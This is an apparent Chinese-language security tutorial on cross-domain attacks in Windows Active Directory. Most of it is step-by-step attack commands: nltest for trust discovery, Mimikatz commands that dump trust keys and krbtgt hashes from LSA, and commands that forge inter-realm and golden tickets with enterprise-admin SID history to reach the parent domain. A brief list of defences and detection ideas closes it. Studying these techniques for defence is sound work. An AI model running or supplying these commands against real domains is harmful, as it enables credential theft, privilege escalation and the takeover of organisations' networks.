跨域攻击的两种方法:域信任密钥和krbtgt散列值
字数 750
更新时间 2025-08-13 12:45:59
跨域攻击技术详解:域信任密钥与krbtgt散列值利用
一、跨域攻击概述
跨域攻击是内网横向移动的重要手段,主要利用Windows域环境中的信任关系实现权限提升和横向渗透。在MITRE ATT&CK矩阵中,域信任关系发现技术于2019年2月被添加。
主要攻击方法
- 利用Web漏洞跨域获取权限
- 利用已知域散列值进行哈希传递攻击或票据传递攻击
- 利用域信任关系进行跨域攻击
二、利用域信任密钥攻击
1. 信息收集阶段
获取域信任信息:
nltest /domain_trusts
确定目标域控制器:
nltest /dclist:xiyou
2. 提取信任密钥
在子域中执行以下Mimikatz命令:
mimikatz.exe privilege::debug "lsadump::lsa /patch /user:父域名$" "lsadump::trust /patch" exit
或针对特定域(如dayu域):
mimikatz.exe privilege::debug "lsadump::lsa /patch /user:dayu$" "lsadump::trust /patch" exit
3. 创建信任票据
在子域中新建用户:
net user 用户名 密码 /add
使用Mimikatz创建信任票据:
mimikatz.exe "Kerberos::golden /domain:子域 /sid:当前SID /sids:目标SID-519 /rc4:信任秘钥 /user:任意用户名 /service:krbtgt /target:目标域 /ticket:dayu.kirbi" exit
4. 利用信任票据
获取目标服务的TGS票据:
asktgs.exe dayu.kirbi CIFS/xiyou.dayu.com
导入票据:
kirbikator.exe lsa CIFS.xiyou.dayu.com.kirbi
三、利用krbtgt散列值攻击
1. 获取krbtgt散列值
在域控制器上执行:
mimikatz.exe "privilege::debug" "lsadump::lsa /patch /user:krbtgt" "sekurlsa::krbtgt" exit
2. 构造黄金票据
在子域内的计算机上使用普通用户权限(testyy)构造黄金票据:
mimikatz "kerberos::golden /user:Administrator /domain:目标域 /sid:目标域SID /krbtgt:krbtgt的NTLM哈希 /ticket:golden.kirbi" "kerberos::ptt golden.kirbi" exit
3. 验证权限
访问父域资源验证权限:
\\dayu1.dayu.com\c$
四、防御建议
- 监控域信任关系变更:定期审计域信任关系,监控异常变更
- 保护krbtgt账户:定期更换krbtgt账户密码(建议每6个月一次)
- 限制域管理员权限:避免域管理员账户在非域控机器上使用
- 启用Kerberos审计:监控异常Kerberos票据请求
- 实施网络分段:限制域控制器之间的通信
- 禁用不必要的域信任:移除不再需要的域信任关系
五、检测方法
- 监控异常票据请求(特别是黄金票据特征)
- 检查异常域信任关系查询(如nltest命令)
- 监控LSASS进程的内存转储行为
- 检测Mimikatz等工具的使用痕迹
通过以上技术细节和防御措施,可以有效防范和检测基于域信任密钥和krbtgt散列值的跨域攻击。
相似文章
相似文章